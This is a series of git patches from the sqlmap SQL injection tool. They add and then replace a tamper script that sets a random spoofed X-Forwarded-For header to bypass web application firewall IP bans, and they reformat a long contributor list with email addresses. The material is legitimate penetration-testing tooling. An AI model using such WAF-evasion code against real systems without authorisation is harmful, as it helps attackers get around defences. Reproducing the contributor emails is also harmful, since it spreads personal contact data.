 create mode 100644 tamper/randomfakeproxy.py

diff --git a/tamper/randomfakeproxy.py b/tamper/randomfakeproxy.py
new file mode 100644
index 000000000..65decde15
--- /dev/null
+++ b/tamper/randomfakeproxy.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+from random import randrange
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def generateIP():
+    blockOne = randrange(0, 255, 1)
+    blockTwo = randrange(0, 255, 1)
+    blockThree = randrange(0, 255, 1)
+    blockFour = randrange(0, 255, 1)
+    if blockOne == 10:
+        return generateIP()
+    elif blockOne == 172:
+        return generateIP()
+    elif blockOne == 192:
+        return generateIP()
+    else:
+        return str(blockOne) + '.' + str(blockTwo) + '.' + str(blockThree) + '.' + str(blockFour)
+
+def tamper(payload, **kwargs):
+    """
+    Append a HTTP Request Parameter to bypass
+    WAF (usually application based ) Ban
+    protection bypass.
+
+    Mehmet INCE
+    """
+
+    headers = kwargs.get("headers", {})
+    headers["X-Forwarded-For"] = generateIP()
+    return payload

From 00fc842c6f94dea51780bbcb2a552a8e782ff4eb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 20 Sep 2014 10:20:57 +0200
Subject: [PATCH 034/492] Update agent.py

---
 lib/core/agent.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 923677b15..2df03da44 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -110,6 +110,9 @@ class Agent(object):
             paramString = origValue
             origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
             origValue = origValue[origValue.index(',') + 1:]
+            match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
+            if match:
+                origValue = match.group("value")
 
         if conf.prefix:
             value = origValue

From 46480d777ad9f20c8c6391ea115a6ff17fdbd1e0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 20 Sep 2014 14:48:36 +0200
Subject: [PATCH 035/492] Update for an Issue #835

---
 doc/THANKS.md             |  3 +++
 tamper/randomfakeproxy.py | 40 ---------------------------------------
 tamper/varnish.py         |  2 +-
 tamper/xforwardedfor.py   | 29 ++++++++++++++++++++++++++++
 4 files changed, 33 insertions(+), 41 deletions(-)
 delete mode 100644 tamper/randomfakeproxy.py
 create mode 100644 tamper/xforwardedfor.py

diff --git a/doc/THANKS.md b/doc/THANKS.md
index e90ff7f88..3878a18fb 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -226,6 +226,9 @@ Daniel Huckmann, <sanitybit@gmail.com>
 Daliev Ilya, <daliser@yandex.ru>
 * for reporting a bug
 
+Mehmet İnce, <mehmet@mehmetince.net>
+* for contributing a tamper script xforwardedfor.py
+
 Jovon Itwaru, <jovon.itwaru@gmail.com>
 * for reporting a minor bug
 
diff --git a/tamper/randomfakeproxy.py b/tamper/randomfakeproxy.py
deleted file mode 100644
index 65decde15..000000000
--- a/tamper/randomfakeproxy.py
+++ /dev/null
@@ -1,40 +0,0 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-from lib.core.enums import PRIORITY
-from random import randrange
-__priority__ = PRIORITY.NORMAL
-
-def dependencies():
-    pass
-
-def generateIP():
-    blockOne = randrange(0, 255, 1)
-    blockTwo = randrange(0, 255, 1)
-    blockThree = randrange(0, 255, 1)
-    blockFour = randrange(0, 255, 1)
-    if blockOne == 10:
-        return generateIP()
-    elif blockOne == 172:
-        return generateIP()
-    elif blockOne == 192:
-        return generateIP()
-    else:
-        return str(blockOne) + '.' + str(blockTwo) + '.' + str(blockThree) + '.' + str(blockFour)
-
-def tamper(payload, **kwargs):
-    """
-    Append a HTTP Request Parameter to bypass
-    WAF (usually application based ) Ban
-    protection bypass.
-
-    Mehmet INCE
-    """
-
-    headers = kwargs.get("headers", {})
-    headers["X-Forwarded-For"] = generateIP()
-    return payload
diff --git a/tamper/varnish.py b/tamper/varnish.py
index 48e94b20b..14f4c6728 100644
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -14,7 +14,7 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Append a HTTP Request Parameter to bypass
+    Append a HTTP header 'X-originating-IP' to bypass
     WAF Protection of Varnish Firewall
 
     Notes:
diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py
new file mode 100644
index 000000000..198c524ce
--- /dev/null
+++ b/tamper/xforwardedfor.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+from random import sample
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def randomIP():
+    numbers = []
+    while not numbers or numbers[0] in (10, 172, 192):
+        numbers = sample(xrange(1, 255), 4)
+    return '.'.join(str(_) for _ in numbers)
+
+def tamper(payload, **kwargs):
+    """
+    Append a fake HTTP header 'X-Forwarded-For' to bypass
+    WAF (usually application based) protection
+    """
+
+    headers = kwargs.get("headers", {})
+    headers["X-Forwarded-For"] = randomIP()
+    return payload

From 6945a0a5707bf16aa482fd7c0a018a9832fdba28 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 20 Sep 2014 14:52:14 +0200
Subject: [PATCH 036/492] Changing @ with (at) in THANKS.md

---
 doc/THANKS.md | 480 +++++++++++++++++++++++++-------------------------
 1 file changed, 240 insertions(+), 240 deletions(-)

diff --git a/doc/THANKS.md b/doc/THANKS.md
index 3878a18fb..b56820891 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -1,780 +1,780 @@
 # Individuals
 
-Andres Tarasco Acuna, <atarasco@gmail.com>
+Andres Tarasco Acuna, <atarasco(at)gmail.com>
 * for suggesting a feature
 
-Santiago Accurso, <saccurso@skygear.com.ar>
+Santiago Accurso, <saccurso(at)skygear.com.ar>
 * for reporting a bug
 
-Syed Afzal, <syed@syedafzal.in>
+Syed Afzal, <syed(at)syedafzal.in>
 * for contributing a WAF script varnish.py
 
-Zaki Akhmad, <zakiakhmad@gmail.com>
+Zaki Akhmad, <zakiakhmad(at)gmail.com>
 * for suggesting a couple of features
 
-Olu Akindeinde, <seyi.akin@gmail.com>
+Olu Akindeinde, <seyi.akin(at)gmail.com>
 * for reporting a couple of bugs
 
-David Alvarez, <david.alvarez.s@gmail.com>
+David Alvarez, <david.alvarez.s(at)gmail.com>
 * for reporting a bug
 
-Sergio Alves, <sergioalexandre.alves@gmail.com>
+Sergio Alves, <sergioalexandre.alves(at)gmail.com>
 * for reporting a bug
 
-Thomas Anderson, <darkc0de@live.com.ph>
+Thomas Anderson, <darkc0de(at)live.com.ph>
 * for reporting a bug
 
-Chip Andrews, <chip@sqlsecurity.com>
+Chip Andrews, <chip(at)sqlsecurity.com>
 * for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
 
-Smith Andy, <teh.one@hotmail.com>
+Smith Andy, <teh.one(at)hotmail.com>
 * for suggesting a feature
 
-Otavio Augusto, <otavioarj@gmail.com>
+Otavio Augusto, <otavioarj(at)gmail.com>
 * for reporting a minor bug
 
-Simon Baker, <simonb@sec-1.com>
+Simon Baker, <simonb(at)sec-1.com>
 * for reporting some bugs
 
-Ryan Barnett, <RBarnett@trustwave.com>
+Ryan Barnett, <RBarnett(at)trustwave.com>
 * for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
 
-Emiliano Bazaes, <emiliano@7espejos.com>
+Emiliano Bazaes, <emiliano(at)7espejos.com>
 * for reporting a minor bug
 
-Daniele Bellucci, <daniele.bellucci@gmail.com>
+Daniele Bellucci, <daniele.bellucci(at)gmail.com>
 * for starting sqlmap project and developing it between July and August 2006
 
-Sebastian Bittig, <s.bittig@r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
+Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
 * for contributing the DB2 support initial patch: fingerprint and enumeration
 
-Anthony Boynes, <aboynes@gmail.com>
+Anthony Boynes, <aboynes(at)gmail.com>
 * for reporting several bugs
 
 Marcelo Toscani Brandao
 * for reporting a bug
 
-Velky Brat, <velkybrat@gmail.com>
+Velky Brat, <velkybrat(at)gmail.com>
 * for suggesting a minor enhancement to the bisection algorithm
 
-James Briggs, <james.briggs@ngssecure.com>
+James Briggs, <james.briggs(at)ngssecure.com>
 * for suggesting a minor enhancement
 
-Gianluca Brindisi, <g@brindi.si>
+Gianluca Brindisi, <g(at)brindi.si>
 * for reporting a couple of bugs
 
-Jack Butler, <fattredd@hotmail.com>
+Jack Butler, <fattredd(at)hotmail.com>
 * for contributing the sqlmap site favicon
 
-Ulisses Castro, <uss.thebug@gmail.com>
+Ulisses Castro, <uss.thebug(at)gmail.com>
 * for reporting a bug
 
-Roberto Castrogiovanni, <castrogiovanni.roberto@gmail.com>
+Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
 * for reporting a minor bug
 
-Cesar Cerrudo, <cesar@argeniss.com>
+Cesar Cerrudo, <cesar(at)argeniss.com>
 * for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
 
-Karl Chen, <quarl@cs.berkeley.edu>
+Karl Chen, <quarl(at)cs.berkeley.edu>
 * for contributing the initial multi-threading patch for the inference algorithm
 
-Y P Chien, <ypchien@cox.net>
+Y P Chien, <ypchien(at)cox.net>
 * for reporting a minor bug
 
-Pierre Chifflier, <pollux@debian.org> and Mark Hymers, <ftpmaster@debian.org>
+Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
 * for uploading and accepting the sqlmap Debian package to the official Debian project repository
 
-Hysia Chow <hysia@icloud.com>
+Hysia Chow <hysia(at)icloud.com>
 * for contributing a couple of WAF scripts
 
-Chris Clements, <cclements@flatearth.net>
+Chris Clements, <cclements(at)flatearth.net>
 * for reporting a couple of bugs
 
-John Cobb, <johnc@nobytes.com>
+John Cobb, <johnc(at)nobytes.com>
 * for reporting a minor bug
 
-Andreas Constantinides, <megahz@megahz.org>
+Andreas Constantinides, <megahz(at)megahz.org>
 * for reporting a minor bug
 
-Andre Costa, <andre.investorsclub@gmail.com>
+Andre Costa, <andre.investorsclub(at)gmail.com>
 * for reporting a minor bug
 * for suggesting a minor enhancement
 
-Ulises U. Cune, <ulises2k@gmail.com>
+Ulises U. Cune, <ulises2k(at)gmail.com>
 * for reporting a bug
 
-Alessandro Curio, <alessandro.curio@gmail.com>
+Alessandro Curio, <alessandro.curio(at)gmail.com>
 * for reporting a minor bug
 
-Alessio Dalla Piazza, <alessio.dallapiazza@gmail.com>
+Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
 * for reporting a couple of bugs
 
-Sherif El-Deeb, <archeldeeb@gmail.com>
+Sherif El-Deeb, <archeldeeb(at)gmail.com>
 * for reporting a minor bug
 
-Stefano Di Paola, <stefano.dipaola@wisec.it>
+Stefano Di Paola, <stefano.dipaola(at)wisec.it>
 * for suggesting good features
 
-Mosk Dmitri, <ya@darkbyte.ru>
+Mosk Dmitri, <ya(at)darkbyte.ru>
 * for reporting a minor bug
 
-Meng Dong, <whenov@gmail.com>
+Meng Dong, <whenov(at)gmail.com>
 * for contributing a code for Waffit integration
 
-Carey Evans, <careye@spamcop.net>
+Carey Evans, <careye(at)spamcop.net>
 * for his fcrypt module that allows crypt(3) support
     on Windows platforms
 
-Shawn Evans, <shawndevans@gmail.com>
+Shawn Evans, <shawndevans(at)gmail.com>
 * for suggesting an idea for one tamper script, greatest.py
 
-Adam Faheem, <faheem.adam@is.co.za>
+Adam Faheem, <faheem.adam(at)is.co.za>
 * for reporting a few bugs
 
-James Fisher, <www@sittinglittleduck.com>
+James Fisher, <www(at)sittinglittleduck.com>
 * for contributing two very good feature requests
 * for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
 
-Jim Forster, <jimforster@goldenwest.com>
+Jim Forster, <jimforster(at)goldenwest.com>
 * for reporting a bug
 
-Rong-En Fan, <rafan@freebsd.org>
+Rong-En Fan, <rafan(at)freebsd.org>
 * for commiting the sqlmap 0.5 port to the official FreeBSD project repository
 
-Giorgio Fedon, <giorgio.fedon@gmail.com>
+Giorgio Fedon, <giorgio.fedon(at)gmail.com>
 * for suggesting a speed improvement for bisection algorithm
 * for reporting a bug when running against Microsoft SQL Server 2005
 
-Kasper Fons, <thefeds@mail.dk>
+Kasper Fons, <thefeds(at)mail.dk>
 * for reporting several bugs
 
-Jose Fonseca, <jose.r.fonseca@gmail.com>
+Jose Fonseca, <jose.r.fonseca(at)gmail.com>
 * for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
     http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
     http://code.google.com/p/jrfonseca/wiki/XDot
 
-Alan Franzoni, <alan.franzoni@gmail.com>
+Alan Franzoni, <alan.franzoni(at)gmail.com>
 * for helping me out with Python subprocess library
 
-Harold Fry, <harold@violaceo.us>
+Harold Fry, <harold(at)violaceo.us>
 * for suggesting a minor enhancement
 
-Daniel G. Gamonal, <lgrecol@gmail.com>
+Daniel G. Gamonal, <lgrecol(at)gmail.com>
 * for reporting a minor bug
 
-Marcos Mateos Garcia, <mmateos@germinus.com>
+Marcos Mateos Garcia, <mmateos(at)germinus.com>
 * for reporting a minor bug
 
-Andrew Gecse, <andrew.gecse@upcmail.hu>
+Andrew Gecse, <andrew.gecse(at)upcmail.hu>
 * for reporting a minor issue
 
-Ivan Giacomelli, <truemilk@insiberia.net>
+Ivan Giacomelli, <truemilk(at)insiberia.net>
 * for reporting a bug
 * for suggesting a minor enhancement
 * for reviewing the documentation
 
-Nico Golde, <nico@ngolde.de>
+Nico Golde, <nico(at)ngolde.de>
 * for reporting a couple of bugs
 
-Oliver Gruskovnjak, <oliver.gruskovnjak@gmail.com>
+Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
 * for reporting a bug
 * for contributing a minor patch
 
-Davide Guerri, <d.guerri@caspur.it>
+Davide Guerri, <d.guerri(at)caspur.it>
 * for suggesting an enhancement
 
-Dan Guido, <dguido@gmail.com>
+Dan Guido, <dguido(at)gmail.com>
 * for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
 
-David Guimaraes, <skysbsb@gmail.com>
+David Guimaraes, <skysbsb(at)gmail.com>
 * for reporting considerable amount of bugs
 * for suggesting several features
 
-Chris Hall, <chris.hall@mod10.net>
+Chris Hall, <chris.hall(at)mod10.net>
 * for coding the prettyprint.py library
 
-Tate Hansen, <tate@clearnetsec.com>
+Tate Hansen, <tate(at)clearnetsec.com>
 * for donating to sqlmap development
 
-Mario Heiderich, <mario.heiderich@gmail.com>
-Christian Matthies, <ch0012@gmail.com>
-Lars H. Strojny, <lars@strojny.net>
+Mario Heiderich, <mario.heiderich(at)gmail.com>
+Christian Matthies, <ch0012(at)gmail.com>
+Lars H. Strojny, <lars(at)strojny.net>
 * for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
 
-Kristian Erik Hermansen, <kristian.hermansen@gmail.com>
+Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
 * for reporting a bug
 * for donating to sqlmap development
 
-Alexander Hagenah, <ah@primepage.de>
+Alexander Hagenah, <ah(at)primepage.de>
 * for reporting a minor bug
 
-Dennis Hecken, <mail@8dh.de>
+Dennis Hecken, <mail(at)8dh.de>
 * for reporting a minor bug
 
-Choi Ho, <counterhacker815@gmail.com>
+Choi Ho, <counterhacker815(at)gmail.com>
 * for reporting a minor bug
 
-Jorge Hoya, <aquinadie@gmail.com>
+Jorge Hoya, <aquinadie(at)gmail.com>
 * for suggesting a minor enhancement
 
-Will Holcomb, <wholcomb@gmail.com>
+Will Holcomb, <wholcomb(at)gmail.com>
 * for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
 
-Daniel Huckmann, <sanitybit@gmail.com>
+Daniel Huckmann, <sanitybit(at)gmail.com>
 * for reporting a couple of bugs
 
-Daliev Ilya, <daliser@yandex.ru>
+Daliev Ilya, <daliser(at)yandex.ru>
 * for reporting a bug
 
-Mehmet İnce, <mehmet@mehmetince.net>
+Mehmet İnce, <mehmet(at)mehmetince.net>
 * for contributing a tamper script xforwardedfor.py
 
-Jovon Itwaru, <jovon.itwaru@gmail.com>
+Jovon Itwaru, <jovon.itwaru(at)gmail.com>
 * for reporting a minor bug
 
-Prashant Jadhav, <prashantjadhav.82@gmail.com>
+Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
 * for reporting a bug
 
-Dirk Jagdmann, <doj@cubic.org>
+Dirk Jagdmann, <doj(at)cubic.org>
 * for reporting a typo in the documentation
 
-Luke Jahnke, <luke.jahnke@gmail.com>
+Luke Jahnke, <luke.jahnke(at)gmail.com>
 * for reporting a bug when running against MySQL < 5.0
 
-Andrew Kitis <andrew.kitis@gmail.com>
+Andrew Kitis <andrew.kitis(at)gmail.com>
 * for contributing a tamper script lowercase.py
 
-David Klein, <david.klein@ipfocus.com.au>
+David Klein, <david.klein(at)ipfocus.com.au>
 * for reporting a minor code improvement
 
-Sven Klemm, <sven@c3d2.de>
+Sven Klemm, <sven(at)c3d2.de>
 * for reporting two minor bugs with PostgreSQL
 
-Anant Kochhar, <anant.kochhar@secureyes.net>
+Anant Kochhar, <anant.kochhar(at)secureyes.net>
 * for providing with feedback on the user's manual
 
-Dmitriy Kononov, <dmitriyknnv@gmail.com>
+Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
 * for reporting a minor bug
 
-Alexander Kornbrust, <ak@red-database-security.com>
+Alexander Kornbrust, <ak(at)red-database-security.com>
 * for reporting a couple of bugs
 
-Krzysztof Kotowicz, <kkotowicz@gmail.com>
+Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
 * for reporting a minor bug
 
-Nicolas Krassas, <krasn@deventum.com>
+Nicolas Krassas, <krasn(at)deventum.com>
 * for reporting a couple of bugs
 
-Oliver Kuckertz, <oliver.kuckertz@mologie.de>
+Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
 * for contributing a minor patch
 
-Alex Landa, <landa.alex86@gmail.com>
+Alex Landa, <landa.alex86(at)gmail.com>
 * for contributing a patch adding beta support for XML output
 
-Guido Landi, <lists@keamera.org>
+Guido Landi, <lists(at)keamera.org>
 * for reporting a couple of bugs
 * for the great technical discussions
 * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
 * for presenting with me at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
 
-Lee Lawson, <Lee.Lawson@dns.co.uk>
+Lee Lawson, <Lee.Lawson(at)dns.co.uk>
 * for reporting a minor bug
 
-John J. Lee, <jjl@pobox.com> and others
+John J. Lee, <jjl(at)pobox.com> and others
 * for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
 
-Nico Leidecker, <nico@leidecker.info>
+Nico Leidecker, <nico(at)leidecker.info>
 * for providing with feedback on a few features
 * for reporting a couple of bugs
 * for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
 
-Gabriel Lima, <pato@bugnet.com.br>
+Gabriel Lima, <pato(at)bugnet.com.br>
 * for reporting a couple of bugs
 
-Svyatoslav Lisin, <sel@3d-tech.ru>
+Svyatoslav Lisin, <sel(at)3d-tech.ru>
 * for suggesting a minor feature
 
-Miguel Lopes, <theoverblue@gmail.com>
+Miguel Lopes, <theoverblue(at)gmail.com>
 * for reporting a minor bug
 
-Truong Duc Luong, <luongductruong@gmail.com>
+Truong Duc Luong, <luongductruong(at)gmail.com>
 * for reporting a minor bug
 
-Pavol Luptak, <pavol.luptak@nethemba.com>
+Pavol Luptak, <pavol.luptak(at)nethemba.com>
 * for reporting a bug when injecting on a POST data parameter
 
-Till Maas, <opensource@till.name>
+Till Maas, <opensource(at)till.name>
 * for suggesting a minor feature
 
-Michael Majchrowicz, <mmajchrowicz@gmail.com>
+Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
 * for extensively beta-testing sqlmap on various MySQL DBMS
 * for providing really appreciated feedback
 * for suggesting a lot of ideas and features
 
-Vinícius Henrique Marangoni, <vinicius_marangoni1@hotmail.com>
+Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
 * for contributing a Portuguese translation of README.md
 
-Ahmad Maulana, <matdhule@gmail.com>
+Ahmad Maulana, <matdhule(at)gmail.com>
 * for contributing a tamper script halfversionedmorekeywords.py
 
-Ferruh Mavituna, <ferruh@mavituna.com>
+Ferruh Mavituna, <ferruh(at)mavituna.com>
 * for exchanging ideas on the implementation of a couple of features
 
-David McNab, <david@conscious.co.nz>
+David McNab, <david(at)conscious.co.nz>
 * for his XMLObject module that allows XML files to be operated on  like Python objects
 
-Spencer J. McIntyre, <smcintyre@securestate.com>
+Spencer J. McIntyre, <smcintyre(at)securestate.com>
 * for reporting a minor bug
 * for contributing a patch for OS fingerprinting on DB2
 
-Brad Merrell, <bradmer12@gmail.com>
+Brad Merrell, <bradmer12(at)gmail.com>
 * for reporting a minor bug
 
-Michael Meyer, <m.meyer2k@gmail.com>
+Michael Meyer, <m.meyer2k(at)gmail.com>
 * for suggesting a minor feature
 
-Enrico Milanese, <enricomilanese@gmail.com>
+Enrico Milanese, <enricomilanese(at)gmail.com>
 * for reporting a minor bug
 * for sharing some ideas for the PHP backdoor
 
-Liran Mimoni, <reactor.leet@gmail.com>
+Liran Mimoni, <reactor.leet(at)gmail.com>
 * for reporting a minor bug
 
-Marco Mirandola, <mmmccc0@gmail.com>
+Marco Mirandola, <mmmccc0(at)gmail.com>
 * for reporting a minor bug
 
-Devon Mitchell, <devon.mitchell1988@yahoo.com>
+Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
 * for reporting a minor bug
 
-Anton Mogilin, <azarmaster81@yahoo.com>
+Anton Mogilin, <azarmaster81(at)yahoo.com>
 * for reporting a few bugs
 
-Sergio Molina, <smolina@wpr.es>
+Sergio Molina, <smolina(at)wpr.es>
 * for reporting a minor bug
 
-Anastasios Monachos, <anastasiosm@gmail.com>
+Anastasios Monachos, <anastasiosm(at)gmail.com>
 * for providing some useful data
 * for suggesting a feature
 * for reporting a couple of bugs
 
-Kirill Morozov, <l0rda@l0rda.biz>
+Kirill Morozov, <l0rda(at)l0rda.biz>
 * for reporting a bug
 * for suggesting a feature
 
-Alejo Murillo Moya, <alex@65535.com>
+Alejo Murillo Moya, <alex(at)65535.com>
 * for reporting a minor bug
 * for suggesting a few features
 
-Yonny Mutai, <yonnym@googlemail.com>
+Yonny Mutai, <yonnym(at)googlemail.com>
 * for reporting a minor bug
 
-Roberto Nemirovsky, <roberto.paes@gmail.com>
+Roberto Nemirovsky, <roberto.paes(at)gmail.com>
 * for pointing me out some enhancements
 
-Simone Onofri, <simone.onofri@gmail.com>
+Simone Onofri, <simone.onofri(at)gmail.com>
 * for patching the PHP web backdoor to make it work properly also on Windows
 
-Michele Orru, <michele.orru@antisnatchor.com>
+Michele Orru, <michele.orru(at)antisnatchor.com>
 * for reporting a couple of bug
 * for suggesting ideas on how to implement the RESTful API
 
-Shaohua Pan, <pan@knownsec.com>
+Shaohua Pan, <pan(at)knownsec.com>
 * for reporting several bugs
 * for suggesting a few features
 
-Antonio Parata, <s4tan@ictsc.it>
+Antonio Parata, <s4tan(at)ictsc.it>
 * for sharing some ideas for the PHP backdoor
 
-Adrian Pastor, <ap@gnucitizen.org>
+Adrian Pastor, <ap(at)gnucitizen.org>
 * for donating to sqlmap development
 
-Christopher Patten, <cpatten@sunera.com>
+Christopher Patten, <cpatten(at)sunera.com>
 * for reporting a bug in the blind SQL injection bisection algorithm
 
-Zack Payton, <zack.payton@executiveinstruments.com>
+Zack Payton, <zack.payton(at)executiveinstruments.com>
 * for reporting a minor bug
 
-Jaime Penalba, <nighterman@painsec.com>
+Jaime Penalba, <nighterman(at)painsec.com>
 * for contributing a patch for INSERT/UPDATE generic boundaries
 
-Pedrito Perez, <0ark1ang3l@gmail.com>
+Pedrito Perez, <0ark1ang3l(at)gmail.com>
 * for reporting a couple of bugs
 
-Brandon Perry, <bperry.volatile@gmail.com>
+Brandon Perry, <bperry.volatile(at)gmail.com>
 * for reporting a couple of bugs
 
-Travis Phillips, <perfect_insanity2004@yahoo.com>
+Travis Phillips, <perfect_insanity2004(at)yahoo.com>
 * for suggesting a minor enhancement
 
-Mark Pilgrim, <mark@diveintomark.org>
+Mark Pilgrim, <mark(at)diveintomark.org>
 * for porting chardet package (Universal Encoding Detector) to Python
 
-Steve Pinkham, <steve.pinkham@gmail.com>
+Steve Pinkham, <steve.pinkham(at)gmail.com>
 * for suggesting a feature
 * for contributing a new SQL injection vector (MSSQL time-based blind)
 * for donating to sqlmap development
 
-Adam Pridgen, <adam.pridgen@gmail.com>
+Adam Pridgen, <adam.pridgen(at)gmail.com>
 * for suggesting some features
 
-Luka Pusic, <luka@pusic.si>
+Luka Pusic, <luka(at)pusic.si>
 * for reporting a couple of bugs
 
-Ole Rasmussen, <olerass@gmail.com>
+Ole Rasmussen, <olerass(at)gmail.com>
 * for reporting a bug
 * for suggesting a feature
 
-Alberto Revelli, <r00t@northernfortress.net>
+Alberto Revelli, <r00t(at)northernfortress.net>
 * for inspiring me to write sqlmap user's manual in SGML
 * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
 
-David Rhoades, <david.rhoades@mavensecurity.com>
+David Rhoades, <david.rhoades(at)mavensecurity.com>
 * for reporting a bug
 
-Andres Riancho, <andres.riancho@gmail.com>
+Andres Riancho, <andres.riancho(at)gmail.com>
 * for beta-testing sqlmap
 * for reporting a bug and suggesting some features
 * for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
 * for suggesting a way for handling DNS caching
 
-Jamie Riden, <jamie.riden@ngssecure.com>
+Jamie Riden, <jamie.riden(at)ngssecure.com>
 * for reporting a minor bug
 
-Alexander Rigbo, <alex@rigbo.se>
+Alexander Rigbo, <alex(at)rigbo.se>
 * for contributing a minor patch
 
-Antonio Riva, <antonio.riva@gmail.com>
+Antonio Riva, <antonio.riva(at)gmail.com>
 * for reporting a bug when running with python 2.5
 
-Ethan Robish, <ethan.robish@gmail.com>
+Ethan Robish, <ethan.robish(at)gmail.com>
 * for reporting a bug
 
-Levente Rog, <levidos@gmail.com>
+Levente Rog, <levidos(at)gmail.com>
 * for reporting a minor bug
 
-Andrea Rossi, <andyroyalbattle@yahoo.it>
+Andrea Rossi, <andyroyalbattle(at)yahoo.it>
 * for reporting a minor bug
 * for suggesting a feature
 
-Frederic Roy, <frederic.roy@telindus.fr>
+Frederic Roy, <frederic.roy(at)telindus.fr>
 * for reporting a couple of bugs
 
-Vladimir Rutsky, <rutsky.vladimir@gmail.com>
+Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
 * for suggesting a couple of minor enhancements
 
-Richard Safran, <allapplyhere@yahoo.com>
+Richard Safran, <allapplyhere(at)yahoo.com>
 * for donating the sqlmap.org domain
 
-Tomoyuki Sakurai, <cherry@trombik.org>
+Tomoyuki Sakurai, <cherry(at)trombik.org>
 * for submitting to the FreeBSD project the sqlmap 0.5 port
 
-Roberto Salgado, <lightos@gmail.com>
+Roberto Salgado, <lightos(at)gmail.com>
 * for contributing considerable amount of tamper scripts
 
-Pedro Jacques Santos Santiago, <pedro__jacques@hotmail.com>
+Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
 * for reporting considerable amount of bugs
 
-Marek Sarvas, <marek.sarvas@gmail.com>
+Marek Sarvas, <marek.sarvas(at)gmail.com>
 * for reporting several bugs
 
-Philippe A. R. Schaeffer, <schaeff@compuphil.de>
+Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
 * for reporting a minor bug
 
-Mohd Zamiri Sanin, <zamiri.sanin@gmail.com>
+Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
 * for reporting a minor bug
 
-Jorge Santos, <jorge_a_santos@hotmail.com>
+Jorge Santos, <jorge_a_santos(at)hotmail.com>
 * for reporting a minor bug
 
-Sven Schluter, <sschlueter@netzwerk.cc>
+Sven Schluter, <sschlueter(at)netzwerk.cc>
 * for contributing a patch
 * for waiting a number of seconds between each HTTP request
 
-Ryan Sears, <rdsears@mtu.edu>
+Ryan Sears, <rdsears(at)mtu.edu>
 * for suggesting a couple of enhancements
 * for donating to sqlmap development
 
-Uemit Seren, <uemit.seren@gmail.com>
+Uemit Seren, <uemit.seren(at)gmail.com>
 * for reporting a minor adjustment when running with python 2.6
 
-Shane Sewell, <ssewell@gmail.com>
+Shane Sewell, <ssewell(at)gmail.com>
 * for suggesting a feature
 
-Ahmed Shawky, <ahmed@isecur1ty.org>
+Ahmed Shawky, <ahmed(at)isecur1ty.org>
 * for reporting a major bug with improper handling of parameter values
 * for reporting a bug
 
